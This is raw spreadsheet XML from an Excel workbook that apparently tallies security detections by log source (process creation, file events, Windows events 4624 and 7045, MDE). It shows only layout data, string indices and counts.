      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2:J2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="15.33203125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="11" customWidth="1"/>
    <col min="3" max="4" width="34.1640625" customWidth="1"/>
    <col min="5" max="5" width="17.83203125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="90" customWidth="1"/>
    <col min="7" max="7" width="24.33203125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="30.6640625" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="42.33203125" style="1" customWidth="1"/>
    <col min="10" max="10" width="150.33203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" ht="17" x14ac:dyDescent="0.2">
      <c r="A1" s="4" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="4" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="4" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="4" t="s">
        <v>35</v>
      </c>
      <c r="E1" s="4" t="s">
        <v>1</v>
      </c>
      <c r="F1" s="5" t="s">
        <v>2</v>
      </c>
      <c r="G1" s="4" t="s">
        <v>4</v>
      </c>
      <c r="H1" s="4" t="s">
        <v>42</v>
      </c>
      <c r="I1" s="5" t="s">
        <v>32</v>
      </c>
      <c r="J1" s="4" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2" s="1"/>
      <c r="F2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9C52C-640B-CF44-8F28-42BC59DA89EE}">
  <dimension ref="A1:H2"/>
  <sheetViews>
    <sheetView topLeftCell="D1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="C1" sqref="C1"/>
      <selection pane="bottomLeft" activeCell="G7" sqref="G7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="15.83203125" customWidth="1"/>
    <col min="2" max="2" width="19.5" customWidth="1"/>
    <col min="3" max="3" width="55.83203125" style="1" customWidth="1"/>
    <col min="4" max="4" width="25.83203125" customWidth="1"/>
    <col min="5" max="5" width="20" customWidth="1"/>
    <col min="6" max="6" width="17.33203125" customWidth="1"/>
    <col min="7" max="7" width="74" style="1" customWidth="1"/>
    <col min="8" max="8" width="150.33203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="17" x14ac:dyDescent="0.2">
      <c r="A1" s="9" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="9" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="10" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="9" t="s">
        <v>14</v>
      </c>
      <c r="E1" s="9" t="s">
        <v>15</v>
      </c>
      <c r="F1" s="9" t="s">
        <v>21</v>
      </c>
      <c r="G1" s="10" t="s">
        <v>22</v>
      </c>
      <c r="H1" s="9" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:8" ht="18" customHeight="1" x14ac:dyDescent="0.2"/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87956-36B5-3A4B-81A2-CA08B1F3354E}">
  <dimension ref="A3:C22"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A4" sqref="A4:A20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="215.83203125" bestFit="1" customWidth="1"/>
    <col min="2" max="3" width="16" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>10</v>
      </c>
      <c r="B3" t="s">
        <v>13</v>
      </c>
      <c r="C3" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>9</v>
      </c>
      <c r="C4">
        <v>64</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3" t="s">
        <v>34</v>
      </c>
      <c r="C5">
        <v>69</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6" s="3" t="s">
        <v>37</v>
      </c>
      <c r="C6">
        <v>28</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C7">
        <v>25</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A8" s="3" t="s">
        <v>44</v>
      </c>
      <c r="C8">
        <v>32</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A9" s="3" t="s">
        <v>45</v>
      </c>
      <c r="C9">
        <v>13</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A10" s="3" t="s">
        <v>48</v>
      </c>
      <c r="C10">
        <v>68</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A11" s="3" t="s">
        <v>51</v>
      </c>
      <c r="C11">
        <v>21</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A12" s="3" t="s">
        <v>52</v>
      </c>
      <c r="C12">
        <v>24</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A13" s="3" t="s">
        <v>53</v>
      </c>
      <c r="C13">
        <v>22</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A14" s="3" t="s">
        <v>55</v>
      </c>
      <c r="C14">
        <v>39</v>
      </c>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A15" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C15">
        <v>27</v>
      </c>
    </row>
    <row r="16" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A16" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C16">
        <v>58</v>
      </c>
    </row>
    <row r="17" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A17" s="3" t="s">
        <v>58</v>
      </c>
      <c r="C17">
        <v>23</v>
      </c>
    </row>
    <row r="18" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A18" s="3" t="s">
        <v>59</v>
      </c>
      <c r="C18">
        <v>50</v>
      </c>
    </row>
    <row r="19" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A19" s="3" t="s">
        <v>60</v>
      </c>
      <c r="C19">
        <v>27</v>
      </c>
    </row>
    <row r="20" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A20" s="3" t="s">
        <v>61</v>
      </c>
      <c r="C20">
        <v>31</v>
      </c>
    </row>
    <row r="21" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A21" s="3" t="s">
        <v>62</v>
      </c>
      <c r="C21">
        <v>145</v>
      </c>
    </row>
    <row r="22" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A22" s="3" t="s">
        <v>11</v>
      </c>
      <c r="C22">
        <v>766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7698E-4B75-3942-98B8-C825FE8EE637}">
  <dimension ref="A3:C10"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A20" sqref="A20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="150.33203125" bestFit="1" customWidth="1"/>
    <col min="2" max="3" width="16" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>10</v>
      </c>
      <c r="B3" t="s">
        <v>13</v>
      </c>
      <c r="C3" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>9</v>
      </c>
      <c r="C4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3" t="s">
        <v>34</v>
      </c>
      <c r="C5">
        <v>5</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6" s="3" t="s">
        <v>37</v>
      </c>
      <c r="C6">
        <v>2</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C7">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A8" s="3" t="s">
        <v>55</v>
      </c>
      <c r="C8">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A9" s="3" t="s">
        <v>59</v>
      </c>
      <c r="C9">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A10" s="3" t="s">
        <v>11</v>
      </c>
      <c r="C10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process_create</vt:lpstr>
      <vt:lpstr>process_access</vt:lpstr>
      <vt:lpstr>file_event</vt:lpstr>
      <vt:lpstr>winevt_4624</vt:lpstr>
      <vt:lpstr>winevt_7045</vt:lpstr>
      <vt:lpstr>mde</vt:lpstr>
      <vt:lpstr>generic</vt:lpstr>
      <vt:lpstr>pc_pivot</vt:lpstr>
      <vt:lpstr>pa_pivot</vt:lpstr>
      <vt:lpstr>file_pivot</vt:lpstr>
      <vt:lpstr>gen_pivot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2025-04-26T10:20:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-08T19:47:36Z</dcterms:modified>
</cp:coreProperties>
</file>